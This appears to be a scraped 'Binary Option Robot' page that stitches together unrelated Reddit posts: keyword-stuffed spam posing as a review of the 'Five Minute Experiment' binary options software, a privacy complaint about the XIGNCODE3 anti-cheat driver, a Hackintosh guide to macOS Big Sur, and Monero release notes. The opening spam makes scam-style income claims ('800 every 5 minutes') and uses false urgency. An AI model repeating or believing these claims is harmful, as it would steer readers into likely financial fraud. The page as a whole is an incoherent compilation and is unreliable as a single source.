7 Binary Options – Binary Option Robot

Five Minute Experiment Review 2015 - Is Five Minute Experiment SCAM Or LEGIT? Best Binary Options Trading Software! The Truth About Five Minute Experiment By James Hawksby Review

Five Minute Experiment Review 2015 - FIVE MINUTE EXPERIMENT?? Find out the Secrets about Five Minute Experiment in this Five Minute Experiment review! So What is Five Minute Experiment Software all about? So Does Five Minute Experiment Actually Work? Is Five Minute Experiment Software application scam or does it really work?
To find answers to these concerns continue reading my in depth and honest Five Minute Experiment Review below.
Five Minute Experiment Description:
Name: Five Minute Experiment
Niche: Binary Options.
This Proven System Makes 800 Every 5 Minutes Like Clockwork! Watch Here!
Official Web site: Join The Five Minute Experiment!! CLICK HERE NOW!!!
Exactly what is Five Minute Experiment?
Five Minute Experiment is generally a binary options trading software that is developed to assistance traders win and forecast the marketplace trends with binary options. The software also offers analyses of the market conditions so that traders can know what should be your next step. It offers different secret methods that eventually assists. traders without making use of any complicated trading indications or follow charts.
Five Minute Experiment Binary Options Trading Method
Base the Five Minute Experiment trading technique. After you see it working, you can begin to execute your strategy with regular sized lots. This method will pay off in time. Every Forex binary options trader should choose an account type that is in accordance with their requirements and expectations. A bigger account does not mean a bigger revenue potential so it is a fantastic idea to begin little and quickly add to your account as your returns increase based upon the winning trading choices the software makes.
Binary Options Trading
To help you trade binary options correctly, it is important to have an understanding behind the fundamentals of Binary Options Trading. Currency Trading, or foreign exchange, is based upon the viewed value of 2 currencies pairs to one another, and is affected by the political stability of the country, inflation and interest rates to name a few things. Keep this in mind as you trade and discover more about binary options to maximize your learning experience.
Five Minute Experiment Summary
In summary, there are some obvious ideas that have been tested in time, in addition to some more recent methods. that you may not have actually thought about. Ideally, as long as you follow what we suggest in this short article you can either get started with trading with Five Minute Experiment or improve on what you have currently done.
James Hawksby has partnered with professional traders to create a Binary Options Software That Works!.
There Is Only A Very Limited Spaces Available
So Act Now Before It's Too Late
Click Here To Claim Your Five Minute Experiment Software LIFETIME User License!!
.
.
.
.
.
.
.
.
.
.
.
.
.
.
Tags: Five Minute Experiment app, Five Minute Experiment information, Five Minute Experiment url, Five Minute Experiment website, Five Minute Experiment youtube video, Five Minute Experiment trading software, get Five Minute Experiment, article about Five Minute Experiment, Five Minute Experiment computer program, Five Minute Experiment the truth, Five Minute Experiment support, Five Minute Experiment support email address, Five Minute Experiment help desk, similar than Five Minute Experiment, better than Five Minute Experiment, Five Minute Experiment contact, Five Minute Experiment demo, Five Minute Experiment video tutorial, how does Five Minute Experiment work, is Five Minute Experiment the best online is Five Minute Experiment a scam, does Five Minute Experiment really work, does Five Minute's Experiment actually work, Five Minute Experiment members area, Five Minute Experiment login page, Five Minute Experiment verification, Five Minute Experiment software reviews, Five Minute Experiment no fake review, Five Minute Experiment Live Broadcast, is Five Minute Experiment real, Five Minute Experiment forex trading, Five Minutes Experiment binary options trading, fiveminuteexperiment.co, fiveminuteexperiment.co review, fiveminuteexperiment.co reviews, Five Minute Experiment automated app, the Five Minute Experiment review, Five Minute Experiment signals, Five Minute Experiment mac os x, Five Minute Experiment broker sign up, Five Minute Experiment free download, reviews of Five Minute Experiment, Five Minute Experiment live results, Five Minute Experiment bonus, Five Minute Experiment honest review, Five Minute Experiment 2015, is Five Minute Experiment worth the risk, Five Minute Experiment pc desktop, Five Minute Experiment free trial,Five Minute Experiment testimonial, Five Minute Experiment scam watch dog, Five Minute Experiment warrior forum, Five Minute Experiment web version, Five Minute Experiment open a account, 358 CONSECUTIVE DAYS OF PROFIT, Five Minute Experiment laptop, Five Minute Experiment revised Method 2015, Five Minute Experiment Unbiased review, is Five Minute Experiment all hype?, real people invested in Five Minute Experiment, is Five Minute Experiment a shame, Five Minute Experiment discount, Five Minute Experiment binary option watch dog review, Five Minute Experiment youtube, seriously will Five Minute Experiment work, Five Minute Experiment facebook, Five Minute Experiment activation code, Five Minute Experiment 2015 Working, Five Minute Experiment twitter, Five Minute Experiment currency trading, Five Minute Experiment real person review, Five Minute Experiment example trade, will Five Minute Experiment work on mobile phone, Completely New Five Minute Experiment, Five Minute Experiment customer service, new Five Minute Experiment, Five Minute Experiment webinar, Five Minute Experiment webinar replay, Five Minute Experiment anybody using this, Five Minute Experiment real or fake, is Five Minute Experiment live trades real, Five Minute Experiment is this a scam, is Five Minute Experiment reliable?, Five Minute Experiment honest reviews, Five Minute Experiment is it a scam, Five Minute Experiment download software, Five Minute Experiment app review, Five Minute Experiment software download, Five Minute Experiment forum, Five Minute Experiment signals, Five Minute Experiment download page, Five Minute Experiment software demo somebody using it, Five Minute Experiment binary software, Five Minute Experiment binary options review, Five Minute Experiment members, Five Minute Experiment scam or legit,Five Minute Experiment comments, minimum deposit for Five Minute Experiment, Five Minute Experiment reviews, Five Minute Experiment binary today, Five Minute Experiment pro review, Five Minute Experiment windows 7, Five Minute Experiment windows 8 and windows XP, Five Minute Experiment scam or real, Five Minute Experiment login, Five Minute Experiment has anybody out there made any money out of it?, Five Minute Experiment vip membership pass, does Five Minute Experiment work on autopilot?, Five Minute Experiment price, is Five Minute Experiment a scam or not, will Five Minute Experiment help me, real truth about Five Minute Experiment, Five Minute Experiment System, Five Minute Experiment By James Hawksby Review,Five Minute Experiment James Hawksby Reviews, Five Minute Experiment inside members page, 5 Minute Experiment, Five Minute Experiment software downloads, how to download Five Minute Experiment, how to access Five Minute Experiment, Five Minute Experiment Robot, how to use Five Minute Experiment, how to trade with Five Minute Experiment, Five Minute Experiment NEWS Update and details, Five Minute Experiment sign in, the Five Minute Experiment trading options, Five Minute Experiment info, Five Minute Experiment information, Five Minute Experiment searching for new winning trades, Five Minute Experiment today, Five Minute Experiment feedback, Five Minute Experiment real user review, Five Minute Experiment customer reviews, Five Minute Experiment consumer review, Five Minute Experiment Review 2015, insider john Five Minute Experiment review, george s Five Minute Experiment review, Five Minute Experiment doesn't work, is Five Minute Experiment another scam or legit, Five Minute Experiment refund, Activate Five Minute Experiment, review of Five Minute Experiment, log on to Five Minute Experiment, is Five Minute Experiment manual binary trading, Five Minute Experiment bot review, Five Minute Experiment test, Five Minute Experiment explanation, what brokers work with Five Minute Experiment software, what is Five Minute Experiment, Five Minute Experiment news, new version of Five Minute Experiment, Five Minute Experiment fan Page, Five Minute Experiment breaking news, Five Minute Experiment Register, Five Minute Experiment sign up, Five Minute Experiment broker sign up, Five Minute Experiment real proof, how to activate auto trading on Five Minute Experiment,Five Minute Experiment robot, Five Minute Experiment members area, Five Minute Experiment sign in, web version Five Minute Experiment, should i use Five Minute Experiment, Five Minute Experiment yes or no, do i need trading experience, Five Minute Experiment create account, Five Minute Experiment instructions, how to get a Five Minute Experiment demo, Five Minute Experiment special, desktop Five Minute Experiment, Five Minute Experiment Secret method, Join Five Minute Experiment, Five Minute Experiment ea trading app, Five Minute Experiment limited time, Five Minute Experiment pros and cons, Five Minute Experiment bad reviews, is Five Minute Experiment software automatic binary trading, Five Minute Experiment negative and positive review, Five Minute Experiment Author, Five Minute Experiment creator, who made Five Minute Experiment, what is the Five Minute Experiment, Five Minute Experiment real review, Five Minute Experiment broker, Five Minute Experiment sign up broker, Five Minute Experiment sign up broker review, Five Minute Experiment fund broker, Five Minute Experiment how to fund broker,Five Minute Experiment deposit funds into broker, how does Five Minute Experiment trade, Five Minute Experiment trading bot, what is Five Minute Experiment and cost?, Five Minute Experiment strategy, Five Minute Experiment password reset, Five Minute Experiment beta tester, Five Minute Experiment comparison, Five Minute Experiment questions and answers, rate & review Five Minute Experiment, rate and reviews Five Minute Experiment, is Five Minute Experiment site legit?, Five Minute Experiment reviews online, is Five Minute Experiment for real, Five Minute Experiment login page, Five Minute Experiment results, Five Minute Experiment winning and losing trades, Five Minute Experiment overview, Five Minute Experiment training, how to setup Five Minute Experiment, Five Minute Experiment home, real testimonial on Five Minute Experiment system, Five Minute Experiment real time trading, start trading with Five Minute Experiment, Five Minute Experiment proof, Five Minute Experiment the truth, Get Five Minute Experiment, Five Minute Experiment Review
Click Here To Read The Comments And See The Five Minute Experiment Software In Action!
submitted by RomriellWegman68 to RomriellWegman [link] [comments]

Bluehole - Let's talk Wellbia/XINGCOD3 user privacy risks for the sake of transparency

For those who don't know..
XINGCODE-3 is a kernel (ring0) privillege process under xhunter1.sys owned by the Korean company Wellbia (www.wellbia.com). Unlike what people say, Wellbia isn't owned or affiliated with Tencent, however, XINGCOD3 is custom designed contractor for each individual game - mainly operating in the APAC region, many of them owned by Tencent.
XINGCODE-3 is outsourced to companies as a product modified to the specific characteristics of the game. The process runs on the highest privilegied level of the OS upon boot and is infamous for being an essential rootkit - on a malware level, it has the highest vulnerability to be abused should Wellbia or any of the 3rd Party Companies be target of an attack.
It has been heavily dissected by the hacking community as being highly intrusive and reversed engineered (although nowadays still easily bypassable by a skilled and engaged modder by created a custom Win Framework).
While most is true for a standard anti-cheating, users should be aware that XINGCOD3 able to scan the entire user memory cache, calls for DLL's, including physical state API's such as GetAsyncKeyState where it scans for the physical state of hardware peripherals, essentially becoming a hardware keylogger. Studying the long history of reverse engineering of this software has shown that Wellbia heavily collects user data for internal processing in order to create whitelists of processes and strings analyzed by evaluating PE binaries - having full access to your OS it also is known to scan and having access to user file directories and collecting and storing paths of modified files under 48 hours for the sake of detecting possible sources of bypassing.
All this data is ultimately collected by Wellbia to their host severs - also via API calls to Korean servers in order to run services such as whitelists, improve algorithm accuracy and run comparative statistics and analysis based on binaries, strings and common flags.
Usually this is a high risk for any service, including BattleEye, EasyAntiCheat, etc. but what's worrying in Wellbia, thus. Bluehole's are actually a couple of points:
(not to mention you can literally just deny the service from installing, which by itself is already a hilarious facepalm situation and nowhere does the TSL call for an API of the service)
  1. Starting off, Wellbia is a rather small development company with having only one product available on the market for rather small companies, the majority hold by Chinese government and countries where the data handling, human rights and user privacy is heavily disregarded. This makes my tinfoil hat think that the studio's network security isn't as fortified as a Sony which had abused rootkits, just due to budget investment alone. Their website is absolutely atrocious and amateur - and for an international company that deals with international stakeholders and clients it's impressive the amount of poor english, errors and ambiguous information a company has in their presentation website - there's instances where the product name is not even correctly placed in their own EULA - if a company cannot invest even in basic PR and presentation something leaves me a bitter taste that their network security isn't anything better. They can handle user binaries but network security is a completely different work. The fact that hackers are easily able to heartbeat their API network servers leaves me confirming this.
  2. This the most fun one. Wellbia website and terms conditions explicitely say that they're not held accountable should anything happen - terms that you agree and are legally binded to by default by agreeing to Bluehole's terms and conditions:" Limitations of Company Responsibility
  1. IGNCODE3 is a software provided for free to users. Users judge and determine to use services served by software developers and providers, and therefore the company does not have responsibility for results and damages which may have occurred from XIGNCODE3 installation and use.
(the fact that in 1. they can't even care to write properly the name of their product means how little they care about things in general - you can have a look at this whole joke of ToS's that I can probably put more effort in writting it: https://www.wellbia.com/?module=Html&action=SiteComp&sSubNo=5 - so I am sorry if I don't trust where my data goes into)
3) It kinda pisses me that Bluehole adopted this in the midst of the their product got released post-purchase. When I initially bought the product, in nowhere was written that the user operative system data was being collected by a third party company to servers located in APAC (and I'm one of those persons who heavily reads terms and conditions) - and the current ToS's still just touch this topic on the slightest and ambiguously - it does not say which data gets collected, discloses who and where it's hold - "third party" could be literally anyone - a major disrespect for your consumers. I'm kinda of pissed off as when I initially purchase the product in very very early stages of the game I didn't agree for any kernel level data collection to be held abroad without disclosure of what data is actually being collected otherwise it would have been a big No on the purchase. The fact that you change the rules of the game and the terms of conditions in the midst of the product release leaves me with two options Use to Your Terms or Don't Use a product I've already purchased now has no use - both changes ingame and these 3rd party implementations are so different from my initial purchase that I feel like it's the equivalent of purchasing a shower which in the next year is so heavily modified that it decides to be a toilet.
I would really like for you Bluehole to show me the initial terms and conditions to when the game was initially released and offer me a refund once you decided to change the product and terms and conditions midway which I don't agree with but am left empty handed with no choice but to abandon the product - thus making this purchase a service which I used for X months and not a good.
I really wish this topic had more visibility as I know that the majority of users are even in the dark about this whole thing and Valve and new game companies really make an effort in asserting their product's disclosures about data transparency and the limit of how much a product can change to be considered a valid product resembelance upon purchase when curating their games in the future - I literally bought a third person survival shooter and ended up with a rootkit chinese FPS.
Sincerely, a pissed off customer - who unlike the majority is concerned about my data privacy and I wish you're ever held accountable for changing sensitive contract topics such as User Privacy mid-release.
-----
EDIT:
For completely removing it from your system should you wish:

Locate the file Xhunter1.sysThis file is located in this directory: C:\Windows\xhunter1.sys

Remove the Registry Entry (regedit on command prompt)The entry is located here: HKEY_LOCAL_MACHINE > SYSTEM > ControlSet001 > Services > xhunter


For more information about XINGCOD3 and previous succesful abuses which show the malignant potential of the rootkit (kudos to Psychotropos):

- https://x86.re/blog/xigncode3-xhunter1.sys-lpe/
- https://github.com/Psychotropos/xhunter1_privesc
submitted by cosmonauts5512 to PUBATTLEGROUNDS [link] [comments]

What's new in macOS 11, Big Sur!

It's that time of year again, and we've got a new version of macOS on our hands! This year we've finally jumped off the 10.xx naming scheme and now going to 11! And with that, a lot has changed under the hood in macOS.
As with previous years, we'll be going over what's changed in macOS and what you should be aware of as a macOS and Hackintosh enthusiast.

Has Nvidia Support finally arrived?

Sadly every year I have to answer the obligatory question, no there is no new Nvidia support. Currently Nvidia's Kepler line is the only natively supported gen.
However macOS 11 makes some interesting changes to the boot process, specifically moving GPU drivers into stage 2 of booting. Why this is relevant is due to Apple's initial reason for killing off Web Drivers: Secure boot. What I mean is that secure boot cannot work with Nvidia's Web Drivers due to how early Nvidia's drivers have to initialize at, and thus Apple refused to sign the binaries. With Big Sur, there could be 3rd party GPUs however the chances are still super slim but slightly higher than with 10.14 and 10.15.

What has changed on the surface

A whole new iOS-like UI

Love it or hate it, we've got a new UI more reminiscent of iOS 14 with hints of skeuomorphism(A somewhat subtle call back to previous mac UIs which have neat details in the icons)
You can check out Apple's site to get a better idea:

macOS Snapshotting

A feature initially baked into APFS back in 2017 with the release of macOS 10.13, High Sierra, now macOS's main System volume has become both read-only and snapshotted. What this means is:
However there are a few things to note with this new enforcement of snapshotting:

What has changed under the hood

Quite a few things actually! Both in good and bad ways unfortunately.

New Kernel Cache system: KernelCollections!

So for the past 15 years, macOS has been using the Prelinked Kernel as a form of Kernel and Kext caching. And with macOS Big Sur's new Read-only, snapshot based system volume, a new version of caching has be developed: KernelCollections!
How this differs to previous OSes:

Secure Boot Changes

With regards to Secure Boot, now all officially supported Macs will also now support some form of Secure Boot even if there's no T2 present. This is now done in 2 stages:
While technically these security features are optional and can be disabled after installation, many features including OS updates will no longer work reliably once disabled. This is due to the heavy reliance of snapshots for OS updates, as mentioned above and so we highly encourage all users to ensure at minimum SecureBootModel is set to Default or higher.

No more symbols required

This point is the most important part, as this is what we use for kext injection in OpenCore. Currently Apple has left symbols in place seemingly for debugging purposes however this is a bit worrying as Apple could outright remove symbols in later versions of macOS. But for Big Sur's cycle, we'll be good on that end however we'll be keeping an eye on future releases of macOS.

New Kernel Requirements

With this update, the AvoidRuntimeDefrag Booter quirk in OpenCore broke. Because of this, the macOS kernel will fall flat when trying to boot. Reason for this is due to cpu_count_enabled_logical_processors requiring the MADT (APIC) table, and so OpenCore will now ensure this table is made accessible to the kernel. Users will however need a build of OpenCore 0.6.0 with commit bb12f5f or newer to resolve this issue.
Additionally, both Kernel Allocation requirements and Secure Boot have also broken with Big Sur due to the new caching system discussed above. Thankfully these have also been resolved in OpenCore 0.6.3.
To check your OpenCore version, run the following in terminal:
nvram 4D1FDA02-38C7-4A6A-9CC6-4BCCA8B30102:opencore-version
If you're not up-to-date and running OpenCore 0.6.3+, see here on how to upgrade OpenCore: Updating OpenCore, Kexts and macOS

Broken Kexts in Big Sur

Unfortunately with the aforementioned KernelCollections, some kexts have unfortunately broken or have been hindered in some way. The main kexts that currently have issues are anything relying on Lilu's userspace patching functionality:
Thankfully most important kexts rely on kernelspace patcher which is now in fact working again.

MSI Navi installer Bug Resolved

For those receiving boot failures in the installer due to having an MSI Navi GPU installed, macOS Big Sur has finally resolved this issue!

New AMD OS X Kernel Patches

For those running on AMD-Based CPUs, you'll want to also update your kernel patches as well since patches have been rewritten for macOS Big Sur support:

Other notable Hackintosh issues

Several SMBIOS have been dropped

Big Sur dropped a few Ivy Bridge and Haswell based SMBIOS from macOS, so see below that yours wasn't dropped:
If your SMBIOS was supported in Catalina and isn't included above, you're good to go! We also have a more in-depth page here: Choosing the right SMBIOS
For those wanting a simple translation for their Ivy and Haswell Machines:

Dropped hardware

Currently only certain hardware has been officially dropped:

Extra long install process

Due to the new snapshot-based OS, installation now takes some extra time with sealing. If you get stuck at Forcing CS_RUNTIME for entitlement, do not shutdown. This will corrupt your install and break the sealing process, so please be patient.

X79 and X99 Boot issues

With Big Sur, IOPCIFamily went through a decent rewriting causing many X79 and X99 boards to fail to boot as well as panic on IOPCIFamily. To resolve this issue, you'll need to disable the unused uncore bridge:
You can also find prebuilts here for those who do not wish to compile the file themselves:

New RTC requirements

With macOS Big Sur, AppleRTC has become much more picky on making sure your OEM correctly mapped the RTC regions in your ACPI tables. This is mainly relevant on Intel's HEDT series boards, I documented how to patch said RTC regions in OpenCorePkg:
For those having boot issues on X99 and X299, this section is super important; you'll likely get stuck at PCI Configuration Begin. You can also find prebuilts here for those who do not wish to compile the file themselves:

SATA Issues

For some reason, Apple removed the AppleIntelPchSeriesAHCI class from AppleAHCIPort.kext. Due to the outright removal of the class, trying to spoof to another ID (generally done by SATA-unsupported.kext) can fail for many and create instability for others. * A partial fix is to block Big Sur's AppleAHCIPort.kext and inject Catalina's version with any conflicting symbols being patched. You can find a sample kext here: Catalina's patched AppleAHCIPort.kext * This will work in both Catalina and Big Sur so you can remove SATA-unsupported if you want. However we recommend setting the MinKernel value to 20.0.0 to avoid any potential issues.

Legacy GPU Patches currently unavailable

Due to major changes in many frameworks around GPUs, those using ASentientBot's legacy GPU patches are currently out of luck. We either recommend users with these older GPUs stay on Catalina until further developments arise or buy an officially supported GPU

What’s new in the Hackintosh scene?

Dortania: a new organization has appeared

As many of you have probably noticed, a new organization focusing on documenting the hackintoshing process has appeared. Originally under my alias, Khronokernel, I started to transition my guides over to this new family as a way to concentrate the vast amount of information around Hackintoshes to both ease users and give a single trusted source for information.
We work quite closely with the community and developers to ensure information's correct, up-to-date and of the best standards. While not perfect in every way, we hope to be the go-to resource for reliable Hackintosh information.
And for the times our information is either outdated, missing context or generally needs improving, we have our bug tracker to allow the community to more easily bring attention to issues and speak directly with the authors:

Dortania's Build Repo

For those who either want to run the lastest builds of a kext or need an easy way to test old builds of something, Dortania's Build Repo is for you!
Kexts here are built right after commit, and currently supports most of Acidanthera's kexts and some 3rd party devs as well. If you'd like to add support for more kexts, feel free to PR: Build Repo source

True legacy macOS Support!

As of OpenCore's latest versioning, 0.6.2, you can now boot every version of x86-based builds of OS X/macOS! A huge achievement on @Goldfish64's part, we now support every major version of kernel cache both 32 and 64-bit wise. This means machines like Yonah and newer should work great with OpenCore and you can even relive the old days of OS X like OS X 10.4!
And Dortania guides have been updated accordingly to accommodate for builds of those eras, we hope you get as much enjoyment going back as we did working on this project!

Intel Wireless: More native than ever!

Another amazing step forward in the Hackintosh community, near-native Intel Wifi support! Thanks to the endless work on many contributors of the OpenIntelWireless project, we can now use Apple's built-in IO80211 framework to have near identical support to those of Broadcom wireless cards including features like network access in recovery and control center support.
For more info on the developments, please see the itlwm project on GitHub: itlwm

Clover's revival? A frankestien of a bootloader

As many in the community have seen, a new bootloader popped up back in April of 2019 called OpenCore. This bootloader was made by the same people behind projects such as Lilu, WhateverGreen, AppleALC and many other extremely important utilities for both the Mac and Hackintosh community. OpenCore's design had been properly thought out with security auditing and proper road mapping laid down, it was clear that this was to be the next stage of hackintoshing for the years we have left with x86.
And now lets bring this back to the old crowd favorite, Clover. Clover has been having a rough time of recent both with the community and stability wise, with many devs jumping ship to OpenCore and Clover's stability breaking more and more with C++ rewrites, it was clear Clover was on its last legs. Interestingly enough, the community didn't want Clover to die, similarly to how Chameleon lived on through Enoch. And thus, we now have the Clover OpenCore integration project(Now merged into Master with r5123+).
The goal is to combine OpenCore into Clover allowing the project to live a bit longer, as Clover's current state can no longer boot macOS Big Sur or older versions of OS X such as 10.6. As of writing, this project seems to be a bit confusing as there seems to be little reason to actually support Clover. Many of Clover's properties have feature-parity in OpenCore and trying to combine both C++ and C ruins many of the features and benefits either languages provide. The main feature OpenCore does not support is macOS-only ACPI injection, however the reasoning is covered here: Does OpenCore always inject SMBIOS and ACPI data into other OSes?

Death of x86 and the future of Hackintoshing

With macOS Big Sur, a big turning point is about to happen with Apple and their Macs. As we know it, Apple will be shifting to in-house designed Apple Silicon Macs(Really just ARM) and thus x86 machines will slowly be phased out of their lineup within 2 years.
What does this mean for both x86 based Macs and Hackintoshing in general? Well we can expect about 5 years of proper OS support for the iMac20,x series which released earlier this year with an extra 2 years of security updates. After this, Apple will most likely stop shipping x86 builds of macOS and hackintoshing as we know it will have passed away.
For those still in denial and hope something like ARM Hackintoshes will arrive, please consider the following:
So while we may be heart broken the journey is coming to a stop in the somewhat near future, hackintoshing will still be a time piece in Apple's history. So enjoy it now while we still can, and we here at Dortania will still continue supporting the community with our guides till the very end!

Getting ready for macOS 11, Big Sur

This will be your short run down if you skipped the above:
For the last 2, see here on how to update: Updating OpenCore, Kexts and macOS
In regards to downloading Big Sur, currently gibMacOS in macOS or Apple's own software updater are the most reliable methods for grabbing the installer. Windows and Linux support is still unknown so please stand by as we continue to look into this situation, macrecovery.py may be more reliable if you require the recovery package.
And as with every year, the first few weeks to months of a new OS release are painful in the community. We highly advise users to stay away from Big Sur for first time installers. The reason is that we cannot determine whether issues are Apple related or with your specific machine, so it's best to install and debug a machine on a known working OS before testing out the new and shiny.
For more in-depth troubleshooting with Big Sur, see here: OpenCore and macOS 11: Big Sur
submitted by dracoflar to hackintosh [link] [comments]

CLI & GUI v0.17.1.3 'Oxygen Orion' released!

This is the CLI & GUI v0.17.1.3 'Oxygen Orion' point release. This release predominantly features bug fixes and performance improvements. Users, however, are recommended to upgrade, as it includes mitigations for the issue where transactions occasionally fail.

(Direct) download links (GUI)

(Direct) download links (CLI)

GPG signed hashes

We encourage users to check the integrity of the binaries and verify that they were signed by binaryFate's GPG key. A guide that walks you through this process can be found here for Windows and here for Linux and Mac OS X.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 # This GPG-signed message exists to confirm the SHA256 sums of Monero binaries. # # Please verify the signature against the key for binaryFate in the # source code repository (/utils/gpg_keys). # # ## CLI 38a04a7bd00733e9d943edba3004e44730c0848fe5e8a4fca4cb29c12d1e6b2f monero-android-armv7-v0.17.1.3.tar.bz2 0e94f58572646992ee21f01d291211ed3608e8a46ecb6612b378a2188390dba0 monero-android-armv8-v0.17.1.3.tar.bz2 ae1a1b61d7b4a06690cb22a3389bae5122c8581d47f3a02d303473498f405a1a monero-freebsd-x64-v0.17.1.3.tar.bz2 57d6f9c25bd1dbc9d6b39fcfb13260b21c5594b4334e8ed3b8922108730ee2f0 monero-linux-armv7-v0.17.1.3.tar.bz2 a0419993fbc6a5ca11bcd2e825acef13e429824f4d8c7ba4ec73ac446d2af2fb monero-linux-armv8-v0.17.1.3.tar.bz2 cf3fb693339caed43a935c890d71ecab5b89c430e778dc5ef0c3173c94e5bf64 monero-linux-x64-v0.17.1.3.tar.bz2 d107384ff7b1f77ee4db93940dbfda24d6045bf59c43169bc81a0118e3986bfa monero-linux-x86-v0.17.1.3.tar.bz2 79557c8bee30b229bda90bb9ee494097d639d60948fc2ad87a029359b56b1b48 monero-mac-x64-v0.17.1.3.tar.bz2 3eee0d0e896fb426ef92a141a95e36cb33ca7d1e1db3c1d4cb7383994af43a59 monero-win-x64-v0.17.1.3.zip c9e9dde61b33adccd7e794eba8ba29d820817213b40a2571282309d25e64e88a monero-win-x86-v0.17.1.3.zip # ## GUI 15ad80b2abb18ac2521398c4dad9b8bfea2e6fc535cf4ebcc60d99b8042d4fb2 monero-gui-install-win-x64-v0.17.1.3.exe 3bed02f9db5b7b2fe4115a636fecf0c6ec9079dd4e9284c8ce2c67d4996e2a4a monero-gui-linux-x64-v0.17.1.3.tar.bz2 23405534c7973a8d6908b76121b81894dc853039c942d7527d254dfde0bd2e8f monero-gui-mac-x64-v0.17.1.3.dmg 0a49ccccb561445f3d7ec0087ddc83a8b76f424fb7d5e0d725222f3639375ec4 monero-gui-win-x64-v0.17.1.3.zip # # # ~binaryFate -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEgaxZH+nEtlxYBq/D8K9NRioL35IFAl+oVkkACgkQ8K9NRioL 35Lmpw//Xs09T4917sbnRH/DW/ovpRyjF9dyN1ViuWQW91pJb+E3i9TY+wU3q85k LyTihDB5pV+3nYgKPL9TlLfaytJIQG0vYHykPWHVmYmvoIs9BLarGwaU3bjO0rh9 ST5GDMdvxmQ5Y1LTwVfKkmBJw26DAs0xAvjBX44oRQjjuUdH6JdLPsqa5Kb++NCM b453m5s8bT3Cw6w0eJB1FQEyQ5BoDrwYcFzzsS1ag/C4Ylq0l6CZfEambfOQvdUi 7D5Rywfhiz2t7cfn7LaoXb74KDA/B1bL+R1/KhCuFqxRTOQzq9IxRywh4VptAAMU UR7jFHFijOMoyggIbkD48JmAjlBnqIyQJt4D5gbHe+tSaSoKdgoTGBAmIvaCZIng jfn9pTNzIJbTptsQhhyZqQQIH87D8BctZfX7pREjJmMNGwN2jFxXqUNqYTso20E6 YLtC1mkZBBZ294xHqT1mQpfznc6uVJhhoJpta0eKxkr1ahrGvWBDGZeVhLswnBcq 9dafAkR14rdK1naiCsygb6hMvBqBohVu/bWuhycJcv6XRvlP7UHkR6R8+s6U4Tk2 zaJERQF+cHQpEak5aEJIvDlb/mxteGyvPkPyL7UmADEQh3C4nREwkDSdnitYnF+e HxJZkshoC98+YCkWUP4+JYOOT158jKao3u0laEOxVGOrPz1Nc64= =Ys4h -----END PGP SIGNATURE----- 

Upgrading (GUI)

Note that you should be able to utilize the automatic updater in the GUI that was recently added. A pop-up will appear shortly with the new binary.
In case you want to update manually, you ought to perform the following steps:
  1. Download the new binaries (the .zip file (Windows) or the tar.bz2 file (Mac OS X and Linux)) from the direct download links in this thread or from the official website. If you run active AV (AntiVirus) software, I'd recommend to apply this guide -> https://monero.stackexchange.com/questions/10798/my-antivirus-av-software-blocks-quarantines-the-monero-gui-wallet-is-there
  2. Extract the new binaries (the .zip file (Windows) or the tar.bz2 file (Mac OS X and Linux) you just downloaded) to a new directory / folder of your liking.
  3. Open monero-wallet-gui. It should automatically load your "old" wallet.
If, for some reason, the GUI doesn't automatically load your old wallet, you can open it as follows:
[1] On the second page of the wizard (first page is language selection) choose Open a wallet from file
[2] Now select your initial / original wallet. Note that, by default, the wallet files are located in Documents\Monero\ (Windows), Users//Monero/ (Mac OS X), or home//Monero/ (Linux).
Lastly, note that a blockchain resync is not needed, i.e., it will simply pick up where it left off.

Upgrading (CLI)

You ought to perform the following steps:
  1. Download the new binaries (the .zip file (Windows) or the tar.bz2 file (Mac OS X and Linux)) from the official website, the direct download links in this thread, or Github.
  2. Extract the new binaries to a new directory of your liking.
  3. Copy over the wallet files from the old directory (i.e. the v0.15.x.x, v0.16.x.x, or v0.17.x.x directory).
  4. Start monerod and monero-wallet-cli (in case you have to use your wallet).
Note that a blockchain resync is not needed. Thus, if you open monerod-v0.17.1.3, it will simply pick up where it left off.

Release notes (GUI)

Some highlights of this minor release are:
  • Android support (experimental)
  • Linux binary is now reproducible (experimental)
  • Simple mode: transaction reliability improvements
  • New transaction confirmation dialog
  • Wizard: minor design changes
  • Linux: high DPI support
  • Fix "can't connect to daemon" issue
  • Minor bug fixes
Some highlights of this major release are:
  • Support for CLSAG transaction format
  • Socks5 proxy support, automatically enabled on Tails
  • Simple mode transactions are sent trough local daemon, improved reliability
  • Portable mode, save wallets + config to "storage" folder
  • History page: improvements, incoming / outgoing labels
  • Transfer: new success dialog
  • CMake build system improvements
  • Windows cross compilation support using Docker
  • Various minor bug and UI fixes
Note that you can find a full change log here.

Release notes (CLI)

Some highlights of this minor release are:
  • Add support for I2P and Tor seed nodes (--tx-proxy)
  • Add --ban-list daemon option to ban a list of IP addresses
  • Switch to Dandelion++ fluff mode if no out connections for stem mode
  • Fix a bug with relay_tx
  • Fix a rare readline related crash
  • Use /16 filtering on IPv4-within-IPv6 addresses
  • Give all hosts the same chance of being picked for connecting
  • Minor bugfixes
Some highlights of this major release are:
  • Support for CLSAG transaction format
  • Deterministic unlock times
  • Enforce claiming maximum coinbase amount
  • Serialization format changes
  • Remove most usage of Boost library
  • Always send raw transactions through P2P, don't use bootstrap daemon
  • Update InProofV1, OutProofV1, and ReserveProofV1 to V2
  • ASM optimizations for wallet refresh (macOS / Linux)
  • Randomized delay when forwarding txes from i2p/tor -> ipv4/6
  • New show_qr_code wallet command for CLI
  • Add ZMQ/Pub support for txpool_add and chain_main events
  • Various bug fixes and performance improvements
Note that you can find a full change log here.

Further remarks

  • A guide on pruning can be found here.
  • Ledger Monero users, please be aware that version 1.7.4 of the Ledger Monero App is required in order to properly use CLI or GUI v0.17.1.3.

Guides on how to get started (GUI)

https://github.com/monero-ecosystem/monero-GUI-guide/blob/mastemonero-GUI-guide.md
Older guides: (These were written for older versions, but are still somewhat applicable)
Sheep’s Noob guide to Monero GUI in Tails
https://medium.com/@Electricsheep56/the-monero-gui-wallet-broken-down-in-plain-english-bd2889b8c202

Ledger GUI guides:

How do I generate a Ledger Monero wallet with the GUI (monero-wallet-gui)?
How do I restore / recreate my Ledger Monero wallet?

Trezor GUI guides:

How do I generate a Trezor Monero wallet with the GUI (monero-wallet-gui)?
How to use Monero with Trezor - by Trezor
How do I restore / recreate my Trezor Monero wallet?

Ledger & Trezor CLI guides

Guides to resolve common issues (GUI)

My antivirus (AV) software blocks / quarantines the Monero GUI wallet, is there a work around I can utilize?
I am missing (not seeing) a transaction to (in) the GUI (zero balance)
